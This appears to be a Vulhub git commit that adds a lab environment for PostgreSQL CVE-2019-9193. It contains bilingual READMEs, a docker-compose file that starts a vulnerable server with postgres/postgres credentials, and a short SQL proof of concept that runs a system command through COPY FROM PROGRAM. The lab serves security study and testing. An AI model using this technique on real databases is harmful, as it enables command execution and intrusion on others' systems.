first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
postgres/CVE-2019-9193/1.png
Normal file
BIN
postgres/CVE-2019-9193/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 217 KiB |
34
postgres/CVE-2019-9193/README.md
Normal file
34
postgres/CVE-2019-9193/README.md
Normal file
@@ -0,0 +1,34 @@
|
||||
# PostgreSQL Arbitrary Command Execution with Admin Privileges (CVE-2019-9193)
|
||||
|
||||
[中文文档](README.zh-cn.md)
|
||||
|
||||
PostgreSQL is a powerful open-source relational database system. A "feature" exists in versions 9.3 through 11 that allows administrators or users with "COPY TO/FROM PROGRAM" privileges to execute arbitrary commands on the system.
|
||||
|
||||
References:
|
||||
|
||||
- <https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5>
|
||||
|
||||
## Environment Setup
|
||||
|
||||
Execute the following command to start a vulnerable PostgreSQL 10.7 server:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
The server will start and listen on the default PostgreSQL port 5432, with default credentials postgres/postgres.
|
||||
|
||||
## Vulnerability Reproduction
|
||||
|
||||
First, connect to the PostgreSQL server and execute the following proof of concept:
|
||||
|
||||
```sql
|
||||
DROP TABLE IF EXISTS cmd_exec;
|
||||
CREATE TABLE cmd_exec(cmd_output text);
|
||||
COPY cmd_exec FROM PROGRAM 'id';
|
||||
SELECT * FROM cmd_exec;
|
||||
```
|
||||
|
||||
The `FROM PROGRAM` statement will execute the `id` command and save the results in the `cmd_exec` table:
|
||||
|
||||
|
||||
32
postgres/CVE-2019-9193/README.zh-cn.md
Normal file
32
postgres/CVE-2019-9193/README.zh-cn.md
Normal file
@@ -0,0 +1,32 @@
|
||||
# PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
|
||||
|
||||
PostgreSQL 是一个功能强大的开源关系型数据库系统。在9.3到11版本中存在一处"特性",管理员或具有"COPY TO/FROM PROGRAM"权限的用户,可以使用这个特性执行任意系统命令。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5>
|
||||
|
||||
## 环境搭建
|
||||
|
||||
执行以下命令启动存在漏洞的 PostgreSQL 10.7 服务器:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
服务器将在默认的PostgreSQL端口5432上启动并监听,默认账号密码为postgres/postgres。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
首先连接到PostgreSQL服务器,并执行以下验证概念(POC):
|
||||
|
||||
```sql
|
||||
DROP TABLE IF EXISTS cmd_exec;
|
||||
CREATE TABLE cmd_exec(cmd_output text);
|
||||
COPY cmd_exec FROM PROGRAM 'id';
|
||||
SELECT * FROM cmd_exec;
|
||||
```
|
||||
|
||||
`FROM PROGRAM`语句将执行`id`命令并将结果保存在`cmd_exec`表中:
|
||||
|
||||
|
||||
8
postgres/CVE-2019-9193/docker-compose.yml
Normal file
8
postgres/CVE-2019-9193/docker-compose.yml
Normal file
@@ -0,0 +1,8 @@
|
||||
version: '2'
|
||||
services:
|
||||
postgres:
|
||||
image: vulhub/postgres:10.7
|
||||
ports:
|
||||
- "5432:5432"
|
||||
environment:
|
||||
- POSTGRES_PASSWORD=postgres
|
||||
Reference in New Issue
Block a user